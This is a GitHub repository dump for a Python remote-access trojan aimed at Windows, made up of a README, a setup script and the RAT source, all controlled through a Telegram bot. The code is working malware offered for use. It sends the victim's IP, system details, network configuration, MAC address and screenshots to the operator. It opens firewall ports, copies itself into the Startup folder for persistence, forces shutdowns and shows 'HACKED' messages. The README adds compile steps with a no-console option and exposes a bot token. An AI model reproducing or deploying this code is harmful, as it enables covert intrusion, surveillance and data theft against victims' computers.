├── CP1.png ├── CP2.png ├── README.md ├── Setup.png ├── Setup.py ├── Token.png ├── Windows-Python-RAT.jpg ├── Windows-Python-RAT.py └── startup.png /CP1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/Windows-Python-RAT/591f4d9a69aca9bcd3c0e5d3fd4320f7a5e0ad98/CP1.png -------------------------------------------------------------------------------- /CP2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/Windows-Python-RAT/591f4d9a69aca9bcd3c0e5d3fd4320f7a5e0ad98/CP2.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Windows-Python-RAT 2 | ## Microsoft Windows Remote Administrator Tool 3 | 4 |
Language: Python
5 |
Coder: Sir.4m1R
6 |
Developer: Ahoora Mansouri
7 | 8 | ------------------------ 9 | 10 |
Powered By The404Hacking
11 |
Digital Security ReSearch Group
12 | 13 | ------------------------------- 14 | # Robot for initial Windows-Python-RAT testing 15 | Bot ID: [@W_P_RAT_Bot](https://t.me/W_P_RAT_Bot) 16 | 17 | Token: `586363223:AAHSLdPnAE60avs_T25l_HjzRahtw6PhxDY` 18 | 19 | ------------------------------- 20 | # Set Bot API-Token 21 | To replace your robot Token in RAT, simply go to Line 35 in the **Windows-Python-RAT.py** file and place your API-TOKEN instead of `TOKEN`. 22 | 23 | In Line 35: 24 | ```python 25 | #Replace Your Bot API-TOKEN 26 | update = Updater("TOKEN") 27 | ``` 28 | Example for Replace Token: 29 | 30 | ![Replace Token](Token.png?raw=true "Replace Token") 31 | ------------------------------- 32 | # StartUP Setting 33 | For startup setting, you must first write the name of your bot before compiling it in the **Windows-Python-RAT.py** file. For example, before compiling the RAT file, you need to go to line 281 and name it as an `YOUR-COMPILED-RAT-NAME.exe`. 34 | 35 | In Line 281: 36 | ```python 37 | os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"') 38 | #replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe' 39 | ``` 40 | Video Tutorial Setting Up a Startup on a RAT: [Watch](https://www.aparat.com/v/MzAX1) 41 | 42 | ![StartUP Setting](startup.png?raw=true "StartUP Setting") 43 | ------------------------------- 44 | # Python 45 | [Windows-Python-RAT](https://github.com/The404Hacking/Windows-Python-RAT/) requires Python version 2.7.x 46 | 47 | Download [Python](https://python.org) Version 2.7.13: Click [Here](https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi) 48 | 49 | ------------------------------- 50 | # Download Python 51 | > [Python 2.7.14 - 2017-09-16](https://www.python.org/downloads/release/python-2714/) 52 | >> Download [for Windows (.msi)](https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi) 53 | ------------------------------- 54 | # Install Python 55 | Learning Install Python on Microsoft Windows: Click [Here](https://t.me/The404Hacking/528) 56 | 57 | ------------------------------- 58 | # Module in Python 59 | To use the **Windows-Python-RAT**, you need to install the following modules in your python. 60 | 61 | For automatic installation, you can first open the **Setup.py** (`python Setup.py`) file and select the `[1] Install Module` option. 62 | 63 | To install the modules manually, simply enter the commands for installing each module in your `CMD` or `Terminal`. 64 | 65 | *Module List:* 66 | 67 | * Upgrade pip 68 | > python -m pip install --upgrade pip 69 | 70 | * Python Telegram Bot (Telegram API for Python) 71 | > python -m pip install python-telegram-bot 72 | 73 | * Pyttsx (for Play Voice) 74 | > python -m pip install pyttsx 75 | 76 | * PyInstaller (for Compile py file) 77 | > python -m pip install pyinstaller 78 | 79 | * Autopy (for Take Screenshot) 80 | > Download from [Telegram Channel](https://t.me/The404Hacking/3317) or [PicoFile](http://s9.picofile.com/file/8323038234/autopy_The404Hacking_.rar.html) and Click on Autopy.exe for Install. 81 | 82 | Password `autopy-[@The404Hacking].rar` File is: **@The404Hacking** 83 | 84 | ------------------------------- 85 | # AutoPy Module in Python 86 | learning Install AutoPy Module on Python 2: [Watch](https://www.aparat.com/v/ULPHV) 87 | 88 | Download from [Telegram Channel](https://t.me/The404Hacking/3317) or [PicoFile](http://s9.picofile.com/file/8323038234/autopy_The404Hacking_.rar.html) and Click on Autopy.exe for Install. 89 | 90 | Password `autopy-[@The404Hacking].rar` File is: **@The404Hacking** 91 | 92 | ------------------------------- 93 | # Clone and Run Setup 94 | + Linux: 95 | ``` 96 | git clone ‎https://github.com/The404Hacking/Windows-Python-RAT.git 97 | cd Windows-Python-RAT 98 | python Setup.py 99 | ``` 100 | + Windows: 101 | ``` 102 | Download from ‎https://github.com/The404Hacking/Windows-Python-RAT/archive/master.zip 103 | Windows-Python-RAT-master.zip 104 | Extract files. 105 | cd Windows-Python-RAT 106 | python Setup.py 107 | ``` 108 | ------------------------------- 109 | Logo: 110 | 111 | ![Windows-Python-RAT Logo](Windows-Python-RAT.jpg?raw=true "Windows-Python-RAT Logo") 112 | 113 | 114 | Setup ScreenShot: 115 | 116 | ![Setup ScreenShot](Setup.png?raw=true "Setup ScreenShot") 117 | 118 | 119 | RAT Control Panel [@W_P_RAT_Bot](https://T.me/W_P_RAT_Bot): 120 | 121 | ![RAT Control Panel ScreenShot1](CP1.png?raw=true "RAT Control Panel ScreenShot1") 122 | 123 | ![RAT Control Panel ScreenShot2](CP2.png?raw=true "RAT Control Panel ScreenShot2") 124 | 125 | 126 | # Download and Clone 127 | > Download: Click [Here](https://github.com/The404Hacking/Windows-Python-RAT/archive/master.zip) 128 | 129 | > Clone: git clone [https://github.com/The404Hacking/Windows-Python-RAT.git](https://github.com/The404Hacking/Windows-Python-RAT.git) 130 | 131 | # The404Hacking | Digital UnderGround Team 132 | [The404Hacking](https://T.me/The404Hacking) 133 | 134 | # Follow us ! 135 | [The404Hacking](https://T.me/The404Hacking) - [The404Cracking](https://T.me/The404Cracking) 136 | 137 | [Instagram](https://instagram.com/The404Hacking) - [GitHub](https://github.com/The404Hacking) 138 | 139 | [YouTube](http://yon.ir/youtube404) - [Aparat](http://www.aparat.com/The404Hacking) 140 | 141 | [Blog](http://the404hacking.blogsky.com) - [Email](mailto:The404Hacking.Team@Gmail.Com) 142 | -------------------------------------------------------------------------------- /Setup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/Windows-Python-RAT/591f4d9a69aca9bcd3c0e5d3fd4320f7a5e0ad98/Setup.png -------------------------------------------------------------------------------- /Setup.py: -------------------------------------------------------------------------------- 1 | ######################################################### 2 | # Windows-Python-RAT Setup # 3 | # [R]emote [A]dministrator [T]ool # 4 | # GitHub: https://github.com/Windows-Python-RAT # 5 | # ##################################################### # 6 | # Coded By Sir.4m1R (Amir Hossein Yeganeh) # 7 | # Telegram: @Sir4m1R # 8 | # Email: Sir.4m1R@Gmail.Com # 9 | # ##################################################### # 10 | # Developed By Hanieh Panahi # 11 | # Telegram: @Hanie0101 # 12 | # ##################################################### # 13 | # The404Hacking # 14 | # Digital Security ReSearch Group # 15 | # ##################################################### # 16 | # Telegram: https://Telegram.me/The404Hacking # 17 | # Instagram: https://instagram.com/The404Hacking # 18 | # Aparat: http://aparat.com/The404Hacking # 19 | # YouTube: http://yon.ir/youtube404 # 20 | # GitHub: https://github.com/The404Hacking # 21 | # LahzeNegar https://lahzenegar.com/The404Hacking # 22 | # Email: The404Hacking.Team@Gmail.Com # 23 | ######################################################### 24 | import os 25 | import platform 26 | import urllib 27 | 28 | def clear(): 29 | linux = 'clear' 30 | windows = 'cls' 31 | os.system([linux, windows][os.name == 'nt']) 32 | clear() 33 | print "\n [***] Please wait ...\n\n" 34 | #data = urllib.urlopen("https://api.ipify.org/") 35 | #ip = data.read() 36 | #os.system("python -m pip install wget") 37 | clear() 38 | banner = '\n' 39 | banner += ' Hi '+platform.uname()[1]+' !\n' 40 | #banner += ' Your IP: '+ip+' !\n' 41 | banner += ' WelCome to Windows-Python-RAT Setup.\n' 42 | banner += ' ------------------------------------\n' 43 | banner += ' Coder: Sir.4m1R (@Sir4m1R)\n' 44 | banner += ' --------------------------\n' 45 | banner += ' The404Hacking\n' 46 | banner += ' Digital Security ReSearch Group\n' 47 | banner += ' ------------------------------------\n' 48 | banner += ' Select a Options:\n' 49 | banner += ' [1] Install Module.\n' 50 | banner += ' [2] Clone again [for Linux].\n' 51 | banner += ' [3] Report Bug.\n' 52 | banner += ' [4] Create Bot.\n' 53 | banner += ' [5] Compile py File [pyinstaller].\n' 54 | banner += ' [6] Windows-Python-RAT GitHub.\n' 55 | banner += ' [7] About.\n' 56 | banner += ' [0] Exit.\n' 57 | print banner 58 | number = input(" [?] WinRAT-Setup~# ") 59 | 60 | if number == 1: 61 | clear() 62 | print "\n [***] Please wait ...\n\n" 63 | os.system("python -m pip install --upgrade pip") 64 | os.system("python -m pip install python-telegram-bot") 65 | os.system("python -m pip install pyttsx") 66 | os.system("python -m pip install autopy") 67 | os.system("python -m pip install pyinstaller") 68 | print '\n\n [+] Installation Completed !\n' 69 | quit() 70 | 71 | elif number == 2: 72 | clear() 73 | if os.name == "nt": 74 | print "\n [***] Please wait ...\n\n [X] Error !\n [!] This Method for Linux and Run in Linux Machine !\n" 75 | quit() 76 | elif os.name != "nt": 77 | print "\n [***] Please wait ...\n\n" 78 | os.system("git clone https://github.com/The404Hacking/Windows-Python-RAT.git") 79 | print '\n\n [+] Windows-Python-RAT Cloned !\n Git: https://github.com/The404Hacking/Windows-Python-RAT\n' 80 | quit() 81 | elif number ==3: 82 | clear() 83 | reportbug = ''' 84 | Hi ! 85 | For Reporting a Bug, Send Mail to: 86 | The404Hacking.Team@Gmail.Com 87 | or 88 | Send Message to Telegram: 89 | https://T.me/Sir4m1R 90 | ''' 91 | print reportbug 92 | quit() 93 | elif number == 4: 94 | clear() 95 | createbot = ''' 96 | Hi 97 | Create Telegram Bot with @BotFather 98 | ----------------------------------- 99 | [1] Go to https://t.me/BotFather and Send /start Command. 100 | [2] Type a Name and Send to BotFather 101 | [3] Select a Username. It must end in 'bot'. 102 | (Ex: Samplebot or Sample_bot) 103 | [4] BotFather send for you a API-TOKEN. 104 | (Ex: 549710235:AAF-cjA1A-upWOZs8y96Qv2AMpQrGJLH6Xo) 105 | 106 | [+] Good :D, Replace Your API-Token in Windows-Python-RAT.py ! (Line: 35) 107 | ''' 108 | print createbot 109 | def edit(): 110 | linux = 'gedit Windows-Python-RAT.py' 111 | windows = 'notepad Windows-Python-RAT.py' 112 | os.system([linux, windows][os.name == 'nt']) 113 | edit() 114 | quit() 115 | elif number == 5: 116 | clear() 117 | installer = ''' 118 | Welcome to Compiler [PyInstaller] 119 | --------------------------------- 120 | Select a Method: 121 | [1] Console 122 | [2] No-Console''' 123 | print installer 124 | num = input("\n [?] WinRAT-Setup~# ") 125 | if num == 1: 126 | print "\n Console Method:" 127 | iconadrs = raw_input(" [?] Icon [*.ico] Address: ") 128 | pyadrs = raw_input(" [?] Python [*.py] Address: ") 129 | pyname = raw_input(" [?] Python File [*.py] Name: ") 130 | print "\n [***] Please wait ...\n\n" 131 | os.system("pyinstaller -i "+iconadrs+" -F "+pyadrs) 132 | exe1 = pyname 133 | rexe = exe1.replace(".py" , "") 134 | clear() 135 | address1 = '\n [Ok] Python Script Console Compile Successfully !\n [+] Directory: \dist\n [+] File: {}.exe\n\n'.format(rexe) 136 | print address1 137 | quit() 138 | elif num == 2: 139 | print "\n No Console Method:" 140 | iconadrs2 = raw_input(" [?] Icon [*.ico] Address: ") 141 | pyadrs2 = raw_input(" [?] Python [*.py] Address: ") 142 | pyname2 = raw_input(" [?] Python File [*.py] Name: ") 143 | print "\n [***] Please wait ...\n\n" 144 | os.system("pyinstaller -i "+iconadrs2+" --noconsole -F "+pyadrs2) 145 | exe2 = pyname2 146 | rexe2 = exe2.replace(".py" , "") 147 | #clear() 148 | address2 = '\n [Ok] Python Script No-Console Compile Successfully !\n [+] Directory: \dist\n [+] File: {}.exe\n\n'.format(rexe2) 149 | print address2 150 | quit() 151 | else: 152 | quit() 153 | 154 | elif number == 6: 155 | clear() 156 | txtgit = ''' 157 | Hi ! 158 | Windows-Python-RAT 159 | ------------------ 160 | Download or Clone This RAT in Your Machine :) 161 | 162 | Select a options: 163 | [1] Clone [for Linux] 164 | [2] Download [for Windows] 165 | ''' 166 | print txtgit 167 | numbr = input(" [?] WinRAT-Setup~# ") 168 | if numbr == 1: 169 | clear() 170 | print "\n [***] Please wait ...\n\n" 171 | os.system("git clone https://github.com/The404Hacking/Windows-Python-RAT.git") 172 | print "\n\n [+] Clone Successfully !\n" 173 | quit() 174 | elif numbr == 2: 175 | print "\n [***] Please wait ...\n\n" 176 | os.system("start https://github.com/The404Hacking/Windows-Python-RAT/master/archive.zip") 177 | print "\n\n [+] Download Successfully !\n" 178 | quit() 179 | else: 180 | quit() 181 | elif number == 7: 182 | clear() 183 | about_text = "\n" 184 | about_text += " Hi "+platform.uname()[1]+" !\n" 185 | about_text += " WelCome to Windows-Python-RAT About :)\n" 186 | about_text += "\n" 187 | about_text += " This RAT Created by Sir.4m1R.\n" 188 | about_text += " This is a RAT for Computer Hacking and Infiltration with Microsoft Windows\n Operating Systems.\n" 189 | about_text += "\n" 190 | about_text += " Using this tool, you can easily perform the Penetration Test on Windows\n and get the commands that are registered in the management robot to get\n the Information you want from the Control Panel Robot (Robot management RAT).\n" 191 | about_text += "\n" 192 | about_text += " This RAT is controlled by a robot in the Telegram. For the robot to work\n and send Information and logs to you in a telegram, you just have to create\n a Robot in the Telegram with @BotFather robot.\n" 193 | about_text += "\n" 194 | about_text += "\n" 195 | about_text += " Powered By Sir.4m1R.\n" 196 | about_text += " Developed By Hanieh Panahi\n" 197 | about_text += " Copyright (C) 2018 The404Hacking.\n" 198 | print about_text 199 | elif number == 0: 200 | print "\n Good Bye "+platform.uname()[1]+" :)\n" 201 | else: 202 | print " Error !" 203 | quit() 204 | -------------------------------------------------------------------------------- /Token.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/Windows-Python-RAT/591f4d9a69aca9bcd3c0e5d3fd4320f7a5e0ad98/Token.png -------------------------------------------------------------------------------- /Windows-Python-RAT.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/Windows-Python-RAT/591f4d9a69aca9bcd3c0e5d3fd4320f7a5e0ad98/Windows-Python-RAT.jpg -------------------------------------------------------------------------------- /Windows-Python-RAT.py: -------------------------------------------------------------------------------- 1 | ######################################################### 2 | # Windows-Python-RAT # 3 | # [R]emote [A]dministrator [T]ool # 4 | # GitHub: https://github.com/Windows-Python-RAT # 5 | # ##################################################### # 6 | # Coded By Sir.4m1R (Amir Hossein Yeganeh) # 7 | # Telegram: @Sir4m1R # 8 | # Email: Sir.4m1R@Gmail.Com # 9 | # ##################################################### # 10 | # Developed By Hanieh Panahi # 11 | # Telegram: @Hanie0101 # 12 | # ##################################################### # 13 | # The404Hacking # 14 | # Digital Security ReSearch Group # 15 | # ##################################################### # 16 | # Telegram: https://Telegram.me/The404Hacking # 17 | # Instagram: https://instagram.com/The404Hacking # 18 | # Aparat: http://aparat.com/The404Hacking # 19 | # YouTube: http://yon.ir/youtube404 # 20 | # GitHub: https://github.com/The404Hacking # 21 | # LahzeNegar https://lahzenegar.com/The404Hacking # 22 | # Email: The404Hacking.Team@Gmail.Com # 23 | ######################################################### 24 | from telegram.ext import Updater , CommandHandler 25 | import telegram 26 | import urllib 27 | import platform 28 | import os 29 | import time 30 | import datetime 31 | import pyttsx 32 | import autopy 33 | # ------------------------------------------------------------------------ 34 | #Replace Your Bot API-TOKEN 35 | update = Updater("TOKEN") 36 | # ------------------------------------------------------------------------ 37 | # /start 38 | def start_method(bot , update): 39 | ippublic = urllib.urlopen("https://ip.42.pl/raw").read() 40 | hello = 'Hi Dear User !\n' 41 | hello += 'WelCome to Your RAT Control Panel [@Bot]\n\n' 42 | #hello += 'Time: '+time.ctime()+'\n\n' 43 | hello += 'New Target Connected !\nTarget IP: '+ippublic+'\n\n' 44 | hello += 'Help: /help\n@The404Hacking\nDigital Security ReSearch Group' 45 | chat_id = update.message.chat_id 46 | bot.sendMessage(chat_id,hello) 47 | 48 | # /help 49 | def help_method(bot , update): 50 | helptxt = ''' 51 | WelCome to Help: 52 | ------------------------ 53 | Bot Commands: 54 | [01] Start & Connect to Target. 55 | [ /] /start 56 | [02] Help RAT. 57 | [ /] /help 58 | [03] System Information. 59 | [ /] /sysinfo 60 | [04] Take Sreenshot. 61 | [ /] /screenshot 62 | [05] Add RAT to StartUP. 63 | [ /] /startup 64 | [06] About RAT. 65 | [ /] /about 66 | [07] Contact RAT. 67 | [ /] /contact 68 | ------------------------ 69 | Other Commands: 70 | [01] Target IP Address: 71 | [ /] /ip 72 | [02] Get Target IPConfig. 73 | [ /] /ipconfig 74 | [03] Get Target MAC Address. 75 | [ /] /getmac 76 | [04] Shutdown Target Windows. 77 | [ /] /shutdown 78 | [05] ReStart Target Windows. 79 | [ /] /restart 80 | [06] Send HACKED Message. 81 | [ /] /message 82 | [07] Send HACKED Voice Message. 83 | [ /] /voicemsg 84 | [08] Create Folder on Target Desktop. 85 | [ /] /folder [NAME] 86 | [09] Swap Target Mouse Button. 87 | [ /] /swapmouse 88 | [10] Open Port on Target Firewall. 89 | [ /] /port [PORT NUMBER] 90 | [11] Change Target Time to 00:00 91 | [ /] /time 92 | [12] Windows-Python-RAT GitHub. 93 | [ /] /github 94 | 95 | @The404Hacking 96 | Digital Security ReSearch Group 97 | ''' 98 | chat_id = update.message.chat_id 99 | bot.sendMessage(chat_id , helptxt) 100 | # ------------------------------------------------------------------------ 101 | # /time 102 | def time_method(bot , update): 103 | os.system("time 00:00") 104 | chat_id = update.message.chat_id 105 | bot.sendMessage(chat_id , "Target Time Changed to 00:00\n\nHelp: /help\n@The404Hacking\Digital Security ReSearch Group") 106 | 107 | # /port [PORT NUMBER] 108 | def port_method(bot , update, args): 109 | os.system('netsh firewall add portopening protocol = TCP port = '+args[0]+' name = "TCP/IP" mode = ENABLE scope = SUBNET') 110 | chat_id = update.message.chat_id 111 | bot.sendMessage(chat_id,"Port Has Been Opened !\n\nPort Number: "+args[0]+"\nProtocol: TCP\nName: TCP/IP\nMode: ENABLE\nScope: SUBNET\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group") 112 | 113 | # /swapmouse 114 | def swapmouse_method(bot , update): 115 | os.system("rundll32 user32,SwapMouseButton") 116 | chat_id = update.message.chat_id 117 | bot.sendMessage(chat_id , "Swap Mouse Button Successfully !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group") 118 | 119 | # /folder [NAME] 120 | def folder_method(bot , update, args): 121 | chat_id = update.message.chat_id 122 | bot.sendMessage(chat_id , "Please Wait ...") 123 | os.system("cd\&&C:&&cd %userprofile%\desktop\&&mkdir "+args[0]) 124 | chat_id = update.message.chat_id 125 | bot.sendMessage(chat_id , "Folder Created with "+args[0]+" Name !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group") 126 | 127 | # /ipconfig 128 | def ipconfig_method(bot , update): 129 | chat_id = update.message.chat_id 130 | bot.sendMessage(chat_id , "Please Wait ...") 131 | os.system("ipconfig >> C:\\Windows\\getip.txt") 132 | getipfile = open("C:\\Windows\\getip.txt" , "rb") 133 | bot.sendDocument(chat_id,getipfile,"GetIP.txt") 134 | getipfile.close() 135 | 136 | # /getmac 137 | def getmac_method(bot , update): 138 | chat_id = update.message.chat_id 139 | bot.sendMessage(chat_id , "Please Wait ...") 140 | os.system("getmac >> C:\\Windows\\getmac.txt") 141 | getipfile = open("C:\\Windows\\getmac.txt" , "rb") 142 | bot.sendDocument(chat_id,getipfile,"GetMAC.txt") 143 | getipfile.close() 144 | 145 | # /voicemsg 146 | def voicemsg_method(bot , update): 147 | chat_id = update.message.chat_id 148 | bot.sendMessage(chat_id , "Voice Message Playing !") 149 | sound = pyttsx.init() 150 | sound.setProperty("rate", 110) 151 | sound.say("Your System Has Been HACKED by The404Hacking - Digital Security ReSearch Group") 152 | sound.runAndWait() 153 | chat_id = update.message.chat_id 154 | bot.sendMessage(chat_id , "Voice Message Played !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group") 155 | 156 | # /shutdown 157 | def shutdown_method(bot , update): 158 | chat_id = update.message.chat_id 159 | bot.sendMessage(chat_id, "Shutdown Successfully !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group") 160 | os.system("shutdown /s /t 1") 161 | 162 | # /message 163 | def message_method(bot , update): 164 | os.system("msg * Your System Has Been HACKED by The404Hacking - Digital Security ReSearch Group") 165 | chat_id = update.message.chat_id 166 | bot.sendMessage(chat_id , "HACKED Message has Send !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group") 167 | 168 | # /restart 169 | def restart_method(bot , update): 170 | chat_id = update.message.chat_id 171 | bot.sendMessage(chat_id , "ReStart Successfully !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group") 172 | os.system("shutdown /r /t 1") 173 | 174 | # /ip 175 | def ip_method(bot , update): 176 | ip = urllib.urlopen("https://ip.42.pl/raw").read() 177 | iptxt = '' 178 | iptxt += 'Target IP Public: '+ip+'\n\n' 179 | iptxt += 'Help: /help\n@The404Hacking\nDigital Security ReSearch Group' 180 | chat_id = update.message.chat_id 181 | bot.sendMessage(chat_id, iptxt) 182 | 183 | # /about 184 | def about_method(bot , update): 185 | about_text = "\n" 186 | about_text += "Hi !\n" 187 | about_text += "WelCome to Windows-Python-RAT About :)\n" 188 | about_text += "\n" 189 | about_text += "This RAT Created by Sir.4m1R.\n" 190 | about_text += "This is a RAT for Computer Hacking and Infiltration with Microsoft Windows Operating Systems.\n" 191 | about_text += "\n" 192 | about_text += "Using this tool, you can easily perform the Penetration Test on Windows and get the commands that are registered in the management robot to get the Information you want from the Control Panel Robot (Robot management RAT)." 193 | about_text += "\n" 194 | about_text += "This RAT is controlled by a robot in the Telegram. For the robot to work and send Information and logs to you in a telegram, you just have to create a Robot in the Telegram with @BotFather robot." 195 | about_text += "\n" 196 | about_text += "\n" 197 | about_text += "Powered By Sir.4m1R.\n" 198 | about_text += "Developed By Hanieh Panahi\n" 199 | about_text += "Copyright (C) 2018 The404Hacking.\n\n" 200 | about_text += "Contact: /contact\n" 201 | about_text += "Help: /help\n@The404Hacking\nDigital Security ReSearch Group" 202 | chat_id = update.message.chat_id 203 | bot.sendMessage(chat_id , about_text) 204 | 205 | # /contact 206 | def contact_method(bot , update): 207 | contact_text = "" 208 | contact_text += "Hi !\n" 209 | contact_text += "\n" 210 | contact_text += "Creator: Sir.4m1R\n" 211 | contact_text += "Telegram: @Sir4m1R\n" 212 | contact_text += "Email: Sir.4m1R@Gmail.Com\n" 213 | contact_text += "-------------------------\n" 214 | contact_text += "Developer: Hanieh Panahi\n" 215 | contact_text += "Telegram: @haniepanahi\n" 216 | contact_text += "Developer Team: @The404Hacking\n" 217 | contact_text += "\n" 218 | contact_text += "The404Hacking\n" 219 | contact_text += "Digital Security ReSearch Group\n" 220 | contact_text += "\n" 221 | contact_text += "Telegram: https://T.me/The404Hacking\n" 222 | contact_text += "Instagram: https://Instagram.com/The404Hacking\n" 223 | contact_text += "Aparat: http://Aparat.com/The404Hacking\n" 224 | contact_text += "YouTube: http://yon.ir/youtube404\n" 225 | contact_text += "GitHub: https://github.com/The404Hacking\n" 226 | contact_text += "LahzeNegar: https://lahzenegar.com/The404Hacking\n" 227 | contact_text += "Email: The404Hacking.Team@Gmail.Com\n" 228 | contact_text += "---------------------------------------------\n" 229 | contact_text += "Admins and Support:\n" 230 | contact_text += "https://T.me/The404HackingAdmins\n" 231 | contact_text += "---------------------------------------------\n" 232 | contact_text += "Powered By Sir.4m1R.\n" 233 | contact_text += "Developed By Hanieh Panahi\n" 234 | contact_text += "Copyright (C) 2018 The404Hacking.\n\n" 235 | contact_text += "About: /about\n" 236 | contact_text += "Help: /help\n@The404Hacking\nDigital Security ReSearch Group" 237 | chat_id = update.message.chat_id 238 | bot.sendMessage(chat_id , contact_text) 239 | 240 | # /sysinfo 241 | def sysinfo_method(bot , update): 242 | ip_public = urllib.urlopen("http://ip.42.pl/raw").read() 243 | data = 'OS: '+platform.uname()[0]+' '+platform.uname()[2]+' - '+platform.architecture()[0]+'\n' 244 | data += 'Node: '+platform.node()+'\n' 245 | data += 'PC Name: '+platform.uname()[1]+'\n' 246 | data += 'Version: '+platform.uname()[3]+'\n' 247 | data += 'System Type: '+platform.uname()[4]+'\n' 248 | data += 'Description: '+platform.uname()[5]+'\n' 249 | data += 'Public IP: '+ip_public+'\n' 250 | data += '\n' 251 | data += 'Help: /help\n@The404Hacking\nDigital Security ReSearch Group' 252 | chat_id = update.message.chat_id 253 | bot.sendMessage(chat_id,data) 254 | 255 | # /github 256 | def github_method(bot , update): 257 | githubtxt = '' 258 | githubtxt += 'Hi !\n\n' 259 | githubtxt += 'Windows-Python-RAT GitHub:\n' 260 | githubtxt += 'https://github.com/The404Hacking/Windows-Python-RAT\n\n' 261 | githubtxt += 'Help: /help\n@The404Hacking\nDigital Security ReSearch Group' 262 | chat_id = update.message.chat_id 263 | bot.sendMessage(chat_id , githubtxt) 264 | 265 | # /screenshot 266 | def screenshot_method(bot , update): 267 | chat_id = update.message.chat_id 268 | bot.sendMessage(chat_id , "Please Wait ...") 269 | image = autopy.bitmap.capture_screen() 270 | image.save("C:\\Windows\\ScreenShot.png") 271 | chat_id = update.message.chat_id 272 | photo = open("C:\\Windows\\ScreenShot.png" , "rb") 273 | bot.sendPhoto(chat_id,photo,"Target ScreenShot !\n\nAgain: /screenshot\n\nHelp: /help\n@The404Hacking") 274 | photo.close() 275 | os.system("del C:\Windows\ScreenShot.png") 276 | 277 | # /startup 278 | def startup_method(bot , update): 279 | chat_id = update.message.chat_id 280 | bot.sendMessage(chat_id , "Please Wait ...") 281 | os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"') 282 | #replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe' 283 | chat_id = update.message.chat_id 284 | bot.sendMessage(chat_id , "RAT Added to Target System Startup.\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group") 285 | # ------------------------------------------------------------------------ 286 | start = CommandHandler("start" , start_method) #/start 287 | update.dispatcher.add_handler(start) 288 | 289 | sysinfo = CommandHandler("sysinfo" , sysinfo_method) #/sysinfo 290 | update.dispatcher.add_handler(sysinfo) 291 | 292 | help_ = CommandHandler("help" , help_method) #/help 293 | update.dispatcher.add_handler(help_) 294 | 295 | screenshot = CommandHandler("screenshot" , screenshot_method) #/screenshot 296 | update.dispatcher.add_handler(screenshot) 297 | 298 | startup = CommandHandler("startup" , startup_method) #/startup 299 | update.dispatcher.add_handler(startup) 300 | 301 | ip = CommandHandler("ip" , ip_method) #/ip 302 | update.dispatcher.add_handler(ip) 303 | 304 | ipconfig = CommandHandler("ipconfig" , ipconfig_method) #/ipconfig 305 | update.dispatcher.add_handler(ipconfig) 306 | 307 | getmac = CommandHandler("getmac" , getmac_method) #/getmac 308 | update.dispatcher.add_handler(getmac) 309 | 310 | shutdown = CommandHandler("shutdown" , shutdown_method) #/shutdown 311 | update.dispatcher.add_handler(shutdown) 312 | 313 | restart = CommandHandler("restart" , restart_method) #/restart 314 | update.dispatcher.add_handler(restart) 315 | 316 | message = CommandHandler("message" , message_method) #/message 317 | update.dispatcher.add_handler(message) 318 | 319 | voicemsg = CommandHandler("voicemsg" , voicemsg_method) #/voicemsg 320 | update.dispatcher.add_handler(voicemsg) 321 | 322 | folder = CommandHandler("folder" , folder_method , pass_args=True) #/folder [NAME] 323 | update.dispatcher.add_handler(folder) 324 | 325 | port = CommandHandler("port" , port_method , pass_args=True) #/port 326 | update.dispatcher.add_handler(port) 327 | 328 | swapmouse = CommandHandler("swapmouse" , swapmouse_method) #/swapmouse 329 | update.dispatcher.add_handler(swapmouse) 330 | 331 | time = CommandHandler("time" , time_method) #/time 332 | update.dispatcher.add_handler(time) 333 | 334 | about = CommandHandler("about" , about_method) #/about 335 | update.dispatcher.add_handler(about) 336 | 337 | contact = CommandHandler("contact" , contact_method) #/contact 338 | update.dispatcher.add_handler(contact) 339 | 340 | github = CommandHandler("github", github_method) 341 | update.dispatcher.add_handler(github) 342 | 343 | update.start_polling() 344 | # ------------------------------------------------------------------------ 345 | -------------------------------------------------------------------------------- /startup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/Windows-Python-RAT/591f4d9a69aca9bcd3c0e5d3fd4320f7a5e0ad98/startup.png --------------------------------------------------------------------------------